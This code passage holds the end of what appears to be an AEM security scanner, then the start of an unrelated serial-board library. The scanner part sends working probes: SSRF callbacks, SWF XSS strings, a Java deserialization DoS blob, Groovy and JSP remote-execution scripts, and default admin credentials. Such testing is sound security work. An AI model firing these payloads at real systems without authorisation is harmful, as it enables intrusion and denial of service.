'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet.{0}.gif?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.{0}.css?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.{0}.js?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.{0}.html?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.{0}.png?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy',
'///libs///cq///analytics///components///sitecatalystpage///segments.json.servlet.{0}.gif?datacenter={{0}}%23&company=xxx&username=zzz&secret=yyyy'
)
cache_buster = randint(1, 2**12)
SITECATALYST3 = (path.format(cache_buster) for path in SITECATALYST3)
for path in itertools.chain(SITECATALYST1, SITECATALYST2, SITECATALYST3):
url = normalize_url(base_url, path)
encoded_orig_url = (base64.b16encode(url.encode())).decode()
back_url = 'http://{0}/{1}/sitecatalyst/{2}/'.format(my_host, token, encoded_orig_url)
url = url.format(back_url)
try:
http_request(url, proxy=proxy, debug=debug)
except:
if debug:
error('Exception while performing a check', check='ssrf_sitecatalyst_servlet', url=url)
time.sleep(10)
if 'sitecatalyst' in d:
u = base64.b16decode(d.get('sitecatalyst')[0]).decode()
f = Finding('SiteCatalystServlet', u,
'SSRF via SiteCatalystServlet was detected. '
'It might result in RCE - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=87')
results.append(f)
return results
@register('autoprovisioning_servlet')
def ssrf_autoprovisioning_servlet(base_url, my_host, debug=False, proxy=None):
global token, d
results = []
AUTOPROVISIONING1 = itertools.product(
(
'/libs/cq/cloudservicesprovisioning/content/autoprovisioning',
'///libs///cq///cloudservicesprovisioning///content///autoprovisioning'
),
(
'.json', '.4.2.1...json', '.1.json', '.html', '.html/a.1.json', '.html/a.4.2.1...json'
)
)
AUTOPROVISIONING1 = list('{0}{1}'.format(p1, p2) for p1, p2 in AUTOPROVISIONING1)
AUTOPROVISIONING2 = itertools.product(
(
'/libs/cq/cloudservicesprovisioning/content/autoprovisioning',
'///libs///cq///cloudservicesprovisioning///content///autoprovisioning'
),
(
'.json;%0a{0}.css', '.json;%0a{0}.png', '.html;%0a{0}.css', '.html;%0a{0}.png', '.json/{0}.css', '.json/{0}.js',
'.json/{0}.png', '.json/a.gif', '.html/{0}.css', '.html/{0}.js', '.html/{0}.png', '.json/{0}.html'
)
)
cache_buster = random_string()
AUTOPROVISIONING2 = list('{0}{1}'.format(p1, p2.format(cache_buster)) for p1, p2 in AUTOPROVISIONING2)
AUTOPROVISIONING3 = itertools.product(
(
'/libs/cq/cloudservicesprovisioning/content/autoprovisioning',
'///libs///cq///cloudservicesprovisioning///content///autoprovisioning'
),
(
'.{0}.css', '.{0}.js', '.{0}.ico', '.{0}.png', '.{0}.jpeg', '.{0}.gif'
)
)
cache_buster = randint(1, 2**12)
AUTOPROVISIONING3 = list('{0}{1}'.format(p1, p2.format(cache_buster)) for p1, p2 in AUTOPROVISIONING3)
for path in itertools.chain(AUTOPROVISIONING1, AUTOPROVISIONING2, AUTOPROVISIONING3):
url = normalize_url(base_url, path)
enc_orig_url = (base64.b16encode(url.encode())).decode()
back_url = 'http://{0}/{1}/autoprovisioning/{2}/'.format(my_host, token, enc_orig_url)
data = 'servicename=analytics&analytics.server={0}&analytics.company=1&analytics.username=2&analytics.secret=3&analytics.reportsuite=4'
data = data.format(back_url)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
try:
http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy, debug=debug)
except:
if debug:
error('Exception while performing a check', check='ssrf_autoprovisioning_servlet', url=url)
time.sleep(10)
if 'autoprovisioning' in d:
u = base64.b16decode(d.get('autoprovisioning')[0]).decode()
f = Finding('AutoProvisioningServlet', u,
'SSRF via AutoProvisioningServlet was detected. '
'It might result in RCE - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=87')
results.append(f)
return results
@register('opensocial_proxy')
def ssrf_opensocial_proxy(base_url, my_host, debug=False, proxy=None):
global token, d
results = []
OPENSOCIAL1 = itertools.product(
(
'/libs/opensocial/proxy{0}?container=default&url={{0}}',
'///libs///opensocial///proxy{0}?container=default&url={{0}}'
),
(
'', '.json', '.1.json', '.4.2.1...json', '.html'
)
)
OPENSOCIAL1 = list(pair[0].format(pair[1]) for pair in OPENSOCIAL1)
OPENSOCIAL2 = itertools.product(
(
'/libs/opensocial/proxy{0}?container=default&url={{0}}',
'///libs///opensocial///proxy{0}?container=default&url={{0}}'
),
(
'/{0}.1.json', '/{0}.4.2.1...json', '/{0}.css', '/{0}.js', '/{0}.png', '/{0}.bmp', ';%0a{0}.css', ';%0a{0}.js',
';%0a{0}.png', ';%0a{0}.html', ';%0a{0}.ico', ';%0a{0}.png', '/{0}.ico', './{0}.html'
)
)
cache_buster = random_string()
OPENSOCIAL2 = list(pair[0].format(pair[1].format(cache_buster)) for pair in OPENSOCIAL2)
OPENSOCIAL3 = itertools.product(
(
'/libs/opensocial/proxy{0}?container=default&url={{0}}',
'///libs///opensocial///proxy{0}?container=default&url={{0}}'
),
(
'.{0}.css', '.{0}.js', '.{0}.png', '.{0}.ico', '.{0}.bmp', '.{0}.gif', '.{0}.html'
)
)
cache_buster = randint(1, 2**12)
OPENSOCIAL3 = list(pair[0].format(pair[1].format(cache_buster)) for pair in OPENSOCIAL3)
for path in itertools.chain(OPENSOCIAL1, OPENSOCIAL2, OPENSOCIAL3):
url = normalize_url(base_url, path)
encoded_orig_url = (base64.b16encode(url.encode())).decode()
back_url = 'http://{0}/{1}/opensocial/{2}/'.format(my_host, token, encoded_orig_url)
url = url.format(back_url)
try:
http_request(url, proxy=proxy, debug=debug)
except:
if debug:
error('Exception while performing a check', check='ssrf_opensocial_proxy', url=url)
time.sleep(10)
if 'opensocial' in d:
u = base64.b16decode(d.get('opensocial')[0]).decode()
f = Finding('Opensocial (shindig) proxy', u,
'SSRF via Opensocial (shindig) proxy. '
'See - https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem?slide=41')
results.append(f)
return results
@register('opensocial_makeRequest')
def ssrf_opensocial_makeRequest(base_url, my_host, debug=False, proxy=None):
global token, d
results = []
MAKEREQUEST1 = itertools.product(
(
'/libs/opensocial/makeRequest{0}?url={{0}}',
'///libs///opensocial///makeRequest{0}?url={{0}}'
),
(
'', '.json', '.1.json', '.4.2.1...json', '.html'
)
)
MAKEREQUEST1 = list(pair[0].format(pair[1]) for pair in MAKEREQUEST1)
MAKEREQUEST2 = itertools.product(
(
'/libs/opensocial/makeRequest{0}?url={{0}}',
'///libs///opensocial///makeRequest{0}?url={{0}}'
),
(
'/{0}.1.json', '/{0}.4.2.1...json', '/{0}.css', '/{0}.js', '/{0}.png', '/{0}.bmp', ';%0a{0}.css', ';%0a{0}.js',
';%0a{0}.png', ';%0a{0}.html', ';%0a{0}.ico', ';%0a{0}.png', '/{0}.ico', './{0}.html'
)
)
cache_buster = random_string()
MAKEREQUEST2 = list(pair[0].format(pair[1].format(cache_buster)) for pair in MAKEREQUEST2)
MAKEREQUEST3 = itertools.product(
(
'/libs/opensocial/makeRequest{0}?url={{0}}',
'///libs///opensocial///makeRequest{0}?url={{0}}'
),
(
'.{0}.css', '.{0}.js', '.{0}.png', '.{0}.ico', '.{0}.bmp', '.{0}.gif', '.{0}.html'
)
)
cache_buster = randint(1, 2**12)
MAKEREQUEST3 = list(pair[0].format(pair[1].format(cache_buster)) for pair in MAKEREQUEST3)
for path in itertools.chain(MAKEREQUEST1, MAKEREQUEST2, MAKEREQUEST3):
url = normalize_url(base_url, path)
encoded_orig_url = (base64.b16encode(url.encode())).decode()
back_url = 'http://{0}/{1}/opensocialmakerequest/{2}/'.format(my_host, token, encoded_orig_url)
url = url.format(back_url)
try:
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
data = 'httpMethod=GET'
http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy, debug=debug)
except:
if debug:
error('Exception while performing a check', check='ssrf_opensocial_makeRequest', url=url)
time.sleep(10)
if 'opensocialmakerequest' in d:
u = base64.b16decode(d.get('opensocialmakerequest')[0]).decode()
f = Finding('Opensocial (shindig) makeRequest', u,
'SSRF via Opensocial (shindig) makeRequest. Yon can specify parameters httpMethod, postData, headers, contentType for makeRequest.')
results.append(f)
return results
@register('swf_xss')
def swf_xss(base_url, my_host, debug=False, proxy=None):
SWFS = (
'/etc/clientlibs/foundation/video/swf/player_flv_maxi.swf?onclick=javascript:confirm(document.domain)',
'/etc/clientlibs/foundation/video/swf/player_flv_maxi.swf.res?onclick=javascript:confirm(document.domain)',
'/etc/clientlibs/foundation/shared/endorsed/swf/slideshow.swf?contentPath=%5c"))%7dcatch(e)%7balert(document.domain)%7d//',
'/etc/clientlibs/foundation/shared/endorsed/swf/slideshow.swf.res?contentPath=%5c"))%7dcatch(e)%7balert(document.domain)%7d//',
'/etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf?javascriptCallbackFunction=alert(document.domain)-String',
'/etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf.res?javascriptCallbackFunction=alert(document.domain)-String',
'/libs/dam/widgets/resources/swfupload/swfupload_f9.swf?swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
'/libs/dam/widgets/resources/swfupload/swfupload_f9.swf.res?swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
'/libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
'/libs/cq/ui/resources/swfupload/swfupload.swf.res?movieName=%22])%7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//',
'/etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf?stagesize=1&namespacePrefix=alert(document.domain)-window',
'/etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf.res?stagesize=1&namespacePrefix=alert(document.domain)-window',
'/etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf?loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain)%7dcatch(e)%7b%7d//',
'/etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf.res?loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain)%7dcatch(e)%7b%7d//',
'/etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf?stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source](document.domain)-window',
'/etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf.res?stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source](document.domain)-window'
)
results = []
for path in SWFS:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
ct = content_type(resp.headers.get('Content-Type', ''))
cd = resp.headers.get('Content-Disposition', '')
if resp.status_code == 200 and ct == 'application/x-shockwave-flash' and not cd:
f = Finding('Reflected XSS via SWF', url,
'AEM exposes SWF that might be vulnerable to reflected XSS. '
'See - https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem?slide=61')
results.append(f)
except:
if debug:
error('Exception while performing a check', check='swf_xss', url=url)
return results
@register('externaljob_servlet')
def deser_externaljob_servlet(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
DESERPAYLOAD = base64.b64decode('rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cH////c=') # Generated with oisdos - java -Xmx25g -jar target/oisdos-1.0.jar ObjectArrayHeap
EXTERNALJOBSERVLET = itertools.product(('/libs/dam/cloud/proxy', '///libs///dam///cloud///proxy'),
('.json', '.css', '.js', '.html', '.ico', '.png', '.gif', '.1.json',
'...4.2.1...json', '.json;%0a{0}.css', '.json;%0a{0}.html', '.json;%0a{0}.ico'))
EXTERNALJOBSERVLET = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in EXTERNALJOBSERVLET)
results = []
for path in EXTERNALJOBSERVLET:
url = normalize_url(base_url, path)
data = {':operation': ('', 'job'), 'file': ('jobevent', DESERPAYLOAD, 'application/octet-stream')}
headers = {'Referer': base_url}
try:
resp = http_request_multipart(url, data=data, additional_headers=headers, proxy=proxy, debug=debug)
if resp.status_code == 500 and 'Java heap space' in str(resp.content):
f = Finding('ExternalJobServlet', url,
'ExternalJobServlet is vulnerable to Java untrusted data deserialization. '
'See - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=102')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='deser_externaljob_servlet', url=url)
return results
@register('webdav')
def exposed_webdav(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
WEBDAV = itertools.product(('/crx/repository/test', ),
('', '.json', '.css', '.html', '.ico',
';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico',
'/{0}.css', '/{0}.html', '/{0}.ico'))
WEBDAV = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in WEBDAV)
results = []
for path in WEBDAV:
try:
url = normalize_url(base_url, path)
resp = http_request(url, proxy=proxy, debug=debug)
www_authenticate = resp.headers.get('WWW-Authenticate', '').lower()
if resp.status_code == 401 and 'webdav' in www_authenticate:
f = Finding('WebDAV exposed', url,
'WebDAV might we vulnerable to CVE-2015-1833. Check it manually. '
'See - http://mail-archives.apache.org/mod_mbox/jackrabbit-announce/201505.mbox/raw/%3C555DA644.8080908@greenbytes.de%3E/3')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_webdav', url=url)
return results
@register('groovy_console')
def exposed_groovy_console(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
SCRIPT = 'def%20command%20%3D%20%22whoami%22%0D%0Adef%20proc%20%3D%20command.execute%28%29%0D%0Aproc.waitFor%28%29%0D%0Aprintln%20%22%24%7Bproc.in.text%7D%22' # 'def+proc+%3d+"cat+/etc/passwd".execute()%0d%0aprintln+proc.text'
GROOVYSCRIPT1 = itertools.product(('/bin/groovyconsole/post.servlet', '///bin///groovyconsole///post.servlet'),
('', '.css', '.html', '.ico', '.json', '.1.json', '...4.2.1...json', ';%0a{0}.css',
';%0a{0}.html', ';%0a{0}.ico'))
GROOVYSCRIPT1 = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in GROOVYSCRIPT1)
GROOVYSCRIPT2 = itertools.product(('/etc/groovyconsole/jcr:content.html', '///etc///groovyconsole///jcr:content.html'),
('', '/{0}.css', '/{0}.html', '/{0}.ico', '/{0}.1.json', '/{0}...4.2.1...json',
';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico'))
GROOVYSCRIPT2 = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in GROOVYSCRIPT2)
GROOVYAUDIT = itertools.product(('/bin/groovyconsole/audit.servlet', '///bin///groovyconsole///audit.servlet'),
('', '.css', '.js', '.html', '.ico', '.png', '.json', '.1.json', '...4.2.1...json',
';%0a{0}.css', ';%0a{0}.html', ';%0a{0}.ico'))
GROOVYAUDIT = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in GROOVYAUDIT)
results = []
for path in itertools.chain(GROOVYSCRIPT1, GROOVYSCRIPT2):
url = normalize_url(base_url, path)
data = 'script={}'.format(SCRIPT)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
try:
resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy, debug=debug)
f = Finding('GroovyConsole', url, 'Groovy console is exposed, RCE is possible. '
'See - https://github.com/OlsonDigital/aem-groovy-console')
if resp.status_code == 200:
if 'executionResult' in str(resp.content):
results.append(f)
break
try:
json.loads(resp.content.decode())['output']
except:
pass
else:
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_groovy_console', url=url)
for path in GROOVYAUDIT:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200:
try:
json.loads(resp.content.decode())['data']
except:
pass
else:
f = Finding('GroovyConsole', url, 'Groovy console is exposed. '
'See - https://github.com/OlsonDigital/aem-groovy-console')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_groovy_console', url=url)
return results
@register('acs_tools')
def exposed_acs_tools(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
DATA = 'scriptdata=%0A%3C%25%40+page+import%3D%22java.io.*%22+%25%3E%0A%3C%25+%0A%09Process+proc+%3D+Runtime.getRuntime().exec(%22echo+abcdef31337%22)%3B%0A%09%0A%09BufferedReader+stdInput+%3D+new+BufferedReader(new+InputStreamReader(proc.getInputStream()))%3B%0A%09StringBuilder+sb+%3D+new+StringBuilder()%3B%0A%09String+s+%3D+null%3B%0A%09while+((s+%3D+stdInput.readLine())+!%3D+null)+%7B%0A%09%09sb.append(s+%2B+%22%5C%5C%5C%5Cn%22)%3B%0A%09%7D%0A%09%0A%09String+output+%3D+sb.toString()%3B%0A%25%3E%0A%3C%25%3Doutput+%25%3E&scriptext=jsp&resource='
FIDDLE = itertools.product(
('/etc/acs-tools/aem-fiddle/_jcr_content.run.html', '/etc/acs-tools/aem-fiddle/_jcr_content.run...4.2.1...html'),
('', '/{0}.css', '/{0}.ico', '/a.png', '/{0}.json', '/{0}.1.json', '?{0}.css', '?{0}.ico'))
FIDDLE = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in FIDDLE)
PREDICATES = ('/bin/acs-tools/qe/predicates.json',)
results = []
for path in FIDDLE:
url = normalize_url(base_url, path)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url, 'Authorization': 'Basic YWRtaW46YWRtaW4='}
try:
resp = http_request(url, 'POST', data=DATA, additional_headers=headers, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'abcdef31337' in str(resp.content):
f = Finding('ACSTools', url, 'ACS Tools Fiddle is exposed, RCE is possible. '
'See - https://adobe-consulting-services.github.io/acs-aem-tools/')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_acs_tools', url=url)
for path in PREDICATES:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'relativedaterange' in str(resp.content):
f = Finding('ACSTools', url, 'ACS Tools predicates. '
'See - https://adobe-consulting-services.github.io/acs-aem-tools/')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_acs_tools', url=url)
return results
def parse_args():
parser = argparse.ArgumentParser(description='AEM hacker by @0ang3el, see the slides - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps')
parser.add_argument('-u', '--url', help='url to scan')
parser.add_argument('--proxy', help='http and https proxy')
parser.add_argument('--debug', action='store_true', help='debug output')
parser.add_argument('--host', help='hostname or IP to use for back connections during SSRF detection')
parser.add_argument('--port', type=int, default=80, help='opens port for SSRF detection')
parser.add_argument('--workers', type=int, default=3, help='number of parallel workers')
parser.add_argument('-H', '--header', nargs='*', help='extra http headers to attach')
parser.add_argument('--handler', action='append', help='run specific handlers, if omitted run all handlers')
parser.add_argument('--listhandlers', action='store_true', help='list available handlers')
return parser.parse_args(sys.argv[1:])
def run_detector(port): # Run SSRF detector in separate thread
global token, d
handler = lambda *args: Detector(token, d, *args)
httpd = HTTPServer(('', port), handler)
t = Thread(target=httpd.serve_forever)
t.daemon = True
t.start()
return httpd
def main():
global extra_headers
args = parse_args()
if args.listhandlers:
print('[*] Available handlers: {0}'.format(list(registered.keys())))
sys.exit(1337)
if args.proxy:
p = args.proxy
proxy = {'http': p, 'https': p}
else:
proxy = {}
if args.header:
for header in args.header:
header_data = header.split(':')
extra_headers[header_data[0].strip()] = header_data[1].strip()
else:
extra_headers = {}
if not args.url:
print('You must specify the -u parameter, bye.')
sys.exit(1337)
if not args.host:
print('You must specify the --host parameter, bye.')
sys.exit(1337)
if not preflight(args.url, proxy):
print('Seems that you provided bad URL. Try another one, bye.')
sys.exit(1337)
httpd = run_detector(args.port)
handlers_to_run = registered.values()
if args.handler:
handlers_to_run = []
for name in args.handler:
handler_func = registered.get(name)
if handler_func:
handlers_to_run.append(handler_func)
with concurrent.futures.ThreadPoolExecutor(args.workers) as tpe:
futures = []
for check in handlers_to_run:
my_host = '{0}:{1}'.format(args.host, args.port)
futures.append(tpe.submit(check, args.url, my_host, args.debug, proxy))
for future in concurrent.futures.as_completed(futures):
for finding in future.result():
print('[+] New Finding!!!')
print('\tName: {}'.format(finding.name))
print('\tUrl: {}'.format(finding.url))
print('\tDescription: {}\n\n'.format(finding.description))
httpd.shutdown()
if __name__ == '__main__':
main()
|
ice.py | #!/usr/bin/env python
################################################################################
import sys
import errno
import socket
import struct
import time
from copy import copy
import functools
import m3_logging
logger = m3_logging.get_logger(__name__)
logger.debug('Got ice.py logger')
try:
import threading
import queue
except ImportError:
logger.warn("Your python installation does not support threads.")
logger.warn("")
logger.warn("Please install a version of python that supports threading.")
raise
try:
import serial
except ImportError:
logger.warn("You do not have the pyserial library installed.")
logger.warn("")
logger.warn("For debian-based systems (e.g. Ubuntu):")
logger.warn("\tsudo apt-get install pyserial")
logger.warn("For rpm-based systems (e.g. Red Hat):")
logger.warn("\tsudo yum install pyserial")
logger.warn("For more installation instructions + see:")
logger.warn("\thttp://pyserial.sourceforge.net/pyserial.html#installation")
raise
################################################################################
class ICE(object):
VERSIONS = ((0,1),(0,2),(0,3))
ONEYEAR = 365 * 24 * 60 * 60
class ICE_Error(Exception):
'''
A base class for all exceptions raised by this module
'''
pass
class FormatError(ICE_Error):
'''
Something in the ICE protocol communicating with the board went wrong.
This error should never be encountered in normal use.
'''
pass
class ParameterError(ICE_Error):
'''
An illegal parameter was passed.
This may be raised by the ICE library if it can determine in advance
that the reqeust is illegal (e.g. out of range), or by the ICE board if
the board rejects the desired setting (e.g. not configurable)
'''
class NAK_Error(ICE_Error):
'''
Raised when an unexpected NAK is returned
'''
pass
class VersionError(ICE_Error):
'''
A method was called that attached ICE version does not support.
'''
def __init__(self, required_version, current_version):
self.required_version = required_version
self.current_version = current_version
super(ICE.VersionError, self).__init__()
class CapabilityError(ICE_Error):
'''
A method was called that the attached ICE board does not have hardware
frontend for.
'''
def __init__(self, required_capability, capabilities):
self.required_capability = required_capability
self.capabilities = capabilities
super(ICE.CapabilityError, self).__init__()
## Support decorators:
def min_proto_version(version):
'''
Decorator for library calls that verifies the requested call is
supported by the protocol version negotiated by the current ICE board.
'''
def wrapped_fn_factory(fn_being_decorated):
@functools.wraps(fn_being_decorated)
def wrapped_fn(self, *args, **kwargs):
if not hasattr(self, "minor"):
raise self.ICE_Error("ICE must be connected first ({})".format(fn_being_decorated))
major, minor = list(map(int, version.split('.')))
if major != 0:
raise self.ICE_Error("Major version bump?")
if self.minor < minor:
raise self.VersionError(minor, self.minor)
return fn_being_decorated(self, *args, **kwargs)
return wrapped_fn
return wrapped_fn_factory
def max_proto_version(version):
'''
Decorator for library calls that verifies the requested call is
supported by the protocol version negotiated by the current ICE board.
'''
def wrapped_fn_factory(fn_being_decorated):
@functools.wraps(fn_being_decorated)
def wrapped_fn(self, *args, **kwargs):
if not hasattr(self, "minor"):
raise self.ICE_Error("ICE must be connected first")
major, minor = list(map(int, version.split('.')))
if major != 0:
raise self.ICE_Error("Major version bump?")
if self.minor > minor:
raise self.VersionError(minor, self.minor)
return fn_being_decorated(self, *args, **kwargs)
return wrapped_fn
return wrapped_fn_factory
def capability(cap):
'''
Decorator for library calls that verifies the requested call is
supported by the capabilities reported by the current ICE board.
'''
def wrapped_fn_factory(fn_being_decorated):
@functools.wraps(fn_being_decorated)
def wrapped_fn(self, *args, **kwargs):
try:
if cap not in self.capabilities:
raise self.CapabilityError(cap, self.capabilities)
except AttributeError:
if 'ice_query_capabilities' not in fn_being_decorated.__name__:
if self.minor != 1:
logger.error("Version decorator must precede capability")
raise
return fn_being_decorated(self, *args, **kwargs)
return wrapped_fn
return wrapped_fn_factory
def __init__(self):
'''
An ICE object.
Most methods are not usuable until connect() has been called.
'''
self.event_id = 0
self.last_event_id = -1
self.sync_queue = queue.Queue(1)
self.msg_handler = {}
self.d_lock = threading.Lock()
self.d_frag = ''
self.msg_handler['d'] = self.d_defragger
self.b_lock = threading.Lock()
self.b_frag = ''
self.msg_handler['b'] = self.b_defragger
self.B_lock = threading.Lock()
self.B_frag = ''
self.msg_handler['B'] = self.B_defragger
self.B_formatter_success_only = False
self.msg_handler['B+'] = self.B_formatter
self.msg_handler['b+'] = self.b_formatter
self.goc_ein_toggle = -1
def connect(self, serial_device, baudrate=115200):
'''
Opens a connection to the ICE board.
The ICE object configuration (e.g. message handlers) cannot be safely
changed after this method is invoked.
'''
self.dev = serial.Serial(serial_device, baudrate, timeout=.1)
if self.dev.isOpen():
logger.info("Connected to serial device at " + self.dev.portstr)
else:
raise self.ICE_Error("Failed to connect to serial device")
self.communicator_stop_request = threading.Event()
self.communicator_stop_response = threading.Event()
self.comm_thread = threading.Thread(target=self.communicator)
self.comm_thread.daemon = True
self.comm_thread.start()
self.negotiate_version()
if self.minor == 2:
# V2 ICE sets GOC on by default, which is annoying. Correct that.
self.goc_set_onoff(False)
def is_connected(self):
return hasattr(self, 'dev')
def destroy(self):
if hasattr(self, 'dev'):
self.communicator_stop_request.set()
self.communicator_stop_response.wait()
self.dev.close()
logger.info("Connection to " + self.dev.portstr + " closed.")
del(self.dev)
def spawn_handler(self, msg_type, event_id, length, msg):
try:
handler = self.msg_handler[msg_type]
#t = threading.Thread(target=self.msg_handler[msg_type],
# args=(msg_type, event_id, length, msg))
#t.daemon = True
#t.start()
except KeyError:
try:
logger.warn("WARNING: No handler registered for message type: " +
str(msg_type))
logger.warn("Known Types:")
for t,f in self.msg_handler.items():
logger.warn("%s\t%s" % (t, str(f)))
logger.warn(" Dropping packet:")
logger.warn("")
logger.warn(" Type: %s" % (msg_type))
logger.warn("Event ID: %d" % (event_id))
logger.warn(" Length: %d" % (length))
logger.warn(" Message:" + msg.encode('hex'))
except Exception as e:
logger.warn("Unhandled exception trying to report unknown message.")
logger.warn(str(e))
logger.warn("Suppressed.")
return
handler(msg_type, event_id, length, msg)
def useful_read(self, length):
b = self.dev.read(length)
while len(b) < length:
r = self.dev.read(length - len(b))
b += r
assert len(b) == length
return b
def communicator(self):
while not self.communicator_stop_request.isSet():
try:
# Read has a timeout of .1 s. Polling is the easiest way to
# do x-platform cancellation
msg_type, event_id, length = self.useful_read(3)
except ValueError:
continue
except (serial.SerialException, OSError):
break
msg_type = ord(msg_type)
event_id = ord(event_id)
length = ord(length)
#print("Got msg type", msg_type, chr(msg_type), length)
msg = self.useful_read(length)
#print(msg.encode('hex'))
if event_id == self.last_event_id:
logger.warn("WARNING: Duplicate event_id! THIS IS A BUG [somewhere]!!")
logger.warn(" Dropping packet:")
logger.warn("")
logger.warn(" Type: %d" % (msg_type))
logger.warn("Event ID: %d" % (event_id))
logger.warn(" Length: %d" % (length))
logger.warn(" Message:" + msg.encode('hex'))
else:
self.last_event_id = event_id
if msg_type in (0,1):
# Ack / Nack response from a synchronous message
try:
if msg_type == 0:
logger.debug("Got an ACK packet. Event: " + str(event_id))
else:
logger.info("Got a NAK packet. Event:" + str(event_id))
self.sync_queue.put((msg_type, msg))
except queue.Full:
logger.warn("WARNING: Synchronization lost. Unsolicited ACK/NAK.")
logger.warn(" Dropping packet:")
logger.warn("")
logger.warn(" Type: %s" % (["ACK","NAK"][msg_type]))
logger.warn("Event ID: %d" % (event_id))
logger.warn(" Length: %d" % (length))
logger.warn(" Message:" + msg.encode('hex'))
else:
msg_type = chr(msg_type)
logger.debug("Got an async message of type: " + msg_type)
self.spawn_handler(msg_type, event_id, length, msg)
self.communicator_stop_response.set()
if hasattr(self, 'on_disconnect'):
self.on_disconnect()
def string_to_masks(self, mask_string):
ones = 0
zeros = 0
mask_string = mask_string.replace(' ','')
idx = len(mask_string)
for c in mask_string:
idx -= 1
if c == '1':
ones |= (1 << idx)
elif c == '0':
zeros |= (1 << idx)
elif c in ('x', 'X'):
continue
else:
raise self.FormatError("Illegal character: >>>" + c + "<<<")
return ones,zeros
def masks_to_strings(self, ones, zeros, length):
s = ''
for l in range(length):
o = bool(ones & (1 << l))
z = bool(zeros & (1 << l))
if o and z:
raise self.FormatError("masks_to_strings has req 1 and req 0?")
if o:
s = '1' + s
elif z:
s = '0' + s
else:
s = 'x' + s
return s
def d_defragger(self, msg_type, event_id, length, msg):
'''
Helper function to defragment 'd' type I2C messages before forwarding.
This helper is installed by default for 'd' messages. It will attempt to
call a helper registered under the name 'd+' when a complete message has
been received. The message will be assigned the event id of the last
received fragment.
It may be safely overridden.
'''
with self.d_lock:
assert msg_type == 'd'
self.d_frag += msg
# XXX: Make version dependent
if length != 255:
sys.stdout.flush()
logger.debug("Got a complete I2C transaction of length %d bytes. Forwarding..." % (len(self.d_frag)))
sys.stdout.flush()
self.spawn_handler('d+', event_id, len(self.d_frag), copy(self.d_frag))
self.d_frag = ''
else:
logger.debug("Got an I2C fragment... thus far %d bytes received:" % (len(self.d_frag)))
